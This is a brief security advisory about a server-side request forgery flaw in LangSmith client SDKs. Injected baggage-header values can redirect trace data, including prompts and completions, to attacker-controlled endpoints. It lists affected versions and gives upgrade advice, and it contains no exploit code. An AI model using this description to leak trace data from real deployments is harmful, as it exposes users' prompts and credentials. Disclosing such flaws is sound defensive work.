Angus-Langchain

**Name of the Vulnerable Software and Affected Versions** LangSmith Client SDKs versions prior to 0.6.3 LangSmith Client SDKs versions prior to 0.4.6 **Description** The LangSmith SDK’s distributed tracing feature is susceptible to Server-Side Request Forgery (SSRF) through manipulation of HTTP headers. An attacker can inject arbitrary `api url` values via the baggage header, potentially causing the SDK to transmit sensitive trace data—including prompts and completions—to attacker-controlled endpoints. The SDK parses incoming HTTP headers using `RunTree.from headers()` in Python and `RunTree.fromHeaders()` in Typescript, accepting attacker-controlled values in the `api url` and `api key` fields within the baggage header without validation. Upon completion of a traced operation, the SDK’s `post()` and `patch()` methods transmit run data to all configured replica URLs, including those injected by an attacker. **Recommendations** Update the Python SDK to version 0.6.3 or later. Update the JavaScript SDK to version 0.4.6 or later.